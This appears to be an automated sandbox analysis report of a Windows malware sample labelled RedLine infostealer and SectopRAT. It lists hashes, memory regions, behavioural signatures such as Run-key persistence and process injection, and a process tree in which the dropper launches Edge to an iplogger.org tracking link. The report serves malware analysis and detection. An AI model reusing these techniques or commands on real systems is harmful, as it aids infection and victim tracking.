SHA256 f88321f4991dc28342d9caf0a318a7ca2556ae95b542b3df6e07bb82f1f6af76
SHA512 7045e4ed80ffc7ae937392ad7fcbf855f4ce22034f1747b1a13e533cfb3a77c169880c086932c73ab8ab37c02df9b6cc0024c64c575569e2651f244da1594955

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80dd11f5de1d60d93bad354ba493679f
SHA1 fad18d59c8342c510af347543569c40e614222ba
SHA256 3901edbfe2913ba0e9b80534d00593baefd02e2b0e1a0ce847b3dd99f4128504
SHA512 c4fc5137443cf7898091ba0abe895b0b12e340c84a8344543a12bea2908716699f50b80504854ce4844ca71a16e6718fce6acc2853b7169d7bce0a974c49a65d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 138833219cd5d65412e592d8cdd5420c
SHA1 a3888fdfb884aa45fd6fb3846ca777418367eea8
SHA256 4b2288612fb8c1a2701d0475bb5a0d97743bacd903ae6de490afdc19338a9630
SHA512 30f9cc0e87c80dc42f5e22a66f302f745f448512fc4900ac98cd5178df05fa1094fb1f715ce8ca8f6f948d920529b9fa03139dda55fef8973dfdf28fb900860b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1fa969cd5a31b7927710fe63d5d85591
SHA1 496893d713621131787360e6627dfab6c01dc71a
SHA256 50af3929a6d6fb13a0fad976f8f73a843bda922eb174162fb2aea42f69825edc
SHA512 9dbd5a9c3d885822ce5e420e648163d5013cd85de600202d59e9ac74b1c0c8cd0c0691b39dc985f706671e49bb4afaac268790bf1968fc241869d5352ffc0787

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d859ed08771576d359665570b0a973cc
SHA1 da8071cda8ea86d96f17205ebe37933bec3ddee0
SHA256 ced1ef123039d2a1f9adb7a23e5973563071705110d324df1c0496a2556fa5eb
SHA512 5aae8fedae467de0c853550ef91b05a388cf32b5c53a1dfbcc3b4405a51d57ef288fe7973a8ec0b1847ccb6c35e2b889dfe24bdc093a65cd67fc4648cc1d3c48

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5b4f70f27bd54d1cd15356d3bee7775b
SHA1 db919e07ad87fb694f303f56d9bff057ed9b3180
SHA256 28833ef8604e26d2db3f4222bbf2eb2724178e179e43f025d8d33c6c0e4f788d
SHA512 12fa2cf71d626d523a345fc968e35bfeb41cf6614b3325fbeb5083501fdf25c0409e00f75ea0725adc09b938f1a8cfff9c4e15f3ea300473f2ff60bb86af53ff

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 26a725eab046fded8dd8f2a4813a0cb0
SHA1 29075a478eca18974fd61ae754e44f39ac571fcb
SHA256 40bc96f76ad58929cfe843746a4fa0ca22213b0b3130870cfdc7c56afb9787b5
SHA512 5f54313cd4a72550c05ea9fa204a44d2f1c7c17d2c1cf7b438d18598a2a020cedc9671a63a8217b9c52491fbb09ef2e0735fc7df257807c4a90839325f229f74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 48037b7240308ab2d8a27ed4f302327a
SHA1 33e35ea092cdae812fa4bf94e3be63d36ccad6fe
SHA256 8a55b5384b769d93ae51929741aa808d4cdfaa02018e0eecf1b1d8c0b61d9ec8
SHA512 6ccae272ccd029b1c63b3a88e93efa5b0b6b905e707491a195a42a51294c780720580f16f168e538565729b65bbfe35c92c4bba8da4d250f9d992bdc24f0845e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14b19a4d977120982f94aeef548caf3b
SHA1 dd200a99bfac08e352115ab5f2c70ee4391ff658
SHA256 a73a4c7ec3373e6c29dcdf70b189ed4d34d4ca9619ed1391f82ce830a41243b7
SHA512 72e8a8c793897ea1255e2ebf78c49261151f573c6de1611ec67283caea0d2f66f94559dc8815293854ff34b5ce9dfe96981e025e4755c4edb74f08adcbfdb94f

memory/2728-617-0x00000000748B0000-0x0000000074F9E000-memory.dmp

memory/2728-618-0x0000000004940000-0x0000000004980000-memory.dmp

memory/2728-619-0x0000000006040000-0x00000000060CA000-memory.dmp

memory/2728-620-0x0000000000700000-0x000000000071E000-memory.dmp

memory/2820-624-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2820-626-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2820-625-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2820-628-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2820-630-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2820-632-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

MD5 398ad49b9ebee2ce6433cb56a9f91338
SHA1 cde7094eb7c29d9922ee38bfb0cb10bd5eff0c34
SHA256 ca258df261b9af13849a1e8a08b5f4a963a6ab8912ffe754d461ff25a110c90a
SHA512 5397cec77fcc82544ad37daed3a5fb39faf8185e75597b600a084c246723f75d41299c5e3485d3230224319e28d3db6066f3e477039103f08baa81fbe613b3fc

memory/2820-637-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2820-635-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2728-638-0x00000000748B0000-0x0000000074F9E000-memory.dmp

memory/2820-639-0x00000000748B0000-0x0000000074F9E000-memory.dmp

memory/2820-640-0x0000000004C60000-0x0000000004CA0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e2a5468ff43d6235519cb09e29b27c2c
SHA1 9671b5790a8eee9f462a6f5ae28c2f2550c7c0a4
SHA256 7667c473357d3ba2650cc47d29e7912f5b7ae6ff37f0ba6b4442973ce7767046
SHA512 b8296feae16f217a1d0e846edc6d5db13fc00ea9414eacb7cea8da68a2d41ce2fe4763c53fd55c870b119b764945fc77e521fa01c069c96abd97ebe5d954b1cb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 12ee24cb52209f1a69a71a5e7d243c74
SHA1 9485e2c603ed3a64d52f6dd8f7c15fe06c690232
SHA256 66d826e6de22e2bc3db6d2aa9746f00c6e1ec88c6008dca08338abbbf479be99
SHA512 c06172477fb3bf5fe950f0d8c35f01722b8201282dbfce9778a5db9cfb36cb24f15d99dce337d9cff77d808863323b66ff653b83e6765b6151f169cee8b14a14

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 db7896f26b8e8d77316557bd8489bcf0
SHA1 5c84979aa70ebde1bb0a18ad97af00cc82a3fe38
SHA256 98d841d5411f0cd1b369d85a8062063c9c6476f5c0a8d32cd02e9ace6484154e
SHA512 0eceef069abdc4ab635b8fd263288910f95eaa495fa5835a38d16d9ebac5c6d4d8c53c8fd2b4d8d526ceec4893ab23a290ecb2d3f63780b0025a5ef16768f243

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cd600dc25d18b058cbe8d1c7f297c3e9
SHA1 0302e950bf6d4e6035c8e7276cece729e82ab77f
SHA256 62b028b297056b99733cbaf44d778a5c3cfd7814ca841a20b71cd4224b0f31d0
SHA512 b99096efcfeba3f59fded8b12c49189f009b195cfe67b48e387216aabbf1792157f4fa1990fd707d99012b80342838dfd1be6120ac3a65ced4b83039a2ba893c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 edfe8fbf9eb268aeaf84d4d165a953cf
SHA1 e96d66ae2e823c96c20630b8d944714ed471d8af
SHA256 744e973270e1496ba279a62eed9beafde8d72765e2a6b29d3f1b832a0dc39c0f
SHA512 e162fd75abb4526715319416335be1d788a271f882796dbf7b42c98255ebefc91fba40a8b5fdc6ac97d39338ff18f4e9d25f1f80ddd35de7050e9aa7087287ad

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c37ee9f5b0118787b115cc17361f6ce6
SHA1 27608a9eb535105c15ff93a7efd2c2234d65ad5b
SHA256 525652d4a45585d4a10093950b5d31a344e2d48b3a22617df3c9773d43d74452
SHA512 829e6f8e9e333157ff30b38aa9962c90e9a31443fae55d83d01675d2663b884c3e5ee25442751ea2a5fca340bc8a566234599340cc78ef0dd120af99a569ebab

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e39ba4f06c3ee4b9ca41caefa69ef78d
SHA1 e894ba987dc77f4ad087b3125401f9b01695daa1
SHA256 5ef3d2c5b24df49e9105672a929016f95dd125885c58ab95a12ecfec73617b1f
SHA512 3e4cdc2a9b2eb6078240a517dfa8a7bf237eda210fac383f2491234bf7e77a6ca87f0211055bc780e070cc3c4309663c888ef5967aadec0a65f5977d19e0e690

memory/2820-874-0x00000000748B0000-0x0000000074F9E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ece2548b2a8bd3af3a7b4b991f9e106
SHA1 85d5f9a4819a23b794db44a2c944d8e146e5e420
SHA256 243c10dbf4149c9c2894351470cb1703ec39e03e72849f5079611b78c70d59e4
SHA512 4dba6d96edc86f26edfb48977dd7034bc140ce9c3488f152f490a576c883b4525d91d178ae654a4662f20b3705aa6a0071335934808f2e5fe06b3f524e3961b3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7cd01903361d5d73404d5df82dfcafb2
SHA1 e6732b60540a8e6ba246c64e9a6f58b1277716c8
SHA256 cb3d01c07a9ea684118e1289279edb73ebedbeaed597c2024471ed6593ce8aa5
SHA512 73ef9c4c2bfc4c658982b78064701698b198f6b8c013b274f798bb7ad7b35102700b4433f78a5bd013ec1da656d400ae2fe86b086e9a14f99861c44acefb870a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 debc15c8fd8cadb2360d06d1268287b9
SHA1 c9b86ba59a860451be04aff9b5234d95e16f1256
SHA256 6926857f7434ba024c824925798d939907c8e04f592a7da1b980ff6199eb21af
SHA512 ad103f4fa7c0dc1f894941090566865e107e16071c5e2deb162fd71c2bd8de268d3a90195ebae72f61647508c92640a6acc880bb90f6145cf65ad383e8f5e613

memory/2820-993-0x0000000004C60000-0x0000000004CA0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 17:11

Reported

2024-03-15 17:13

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1896 set thread context of 4384 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1996 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4420 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4420 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4196 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 4196 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 4196 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 1144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 1144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B19.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1XQju7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

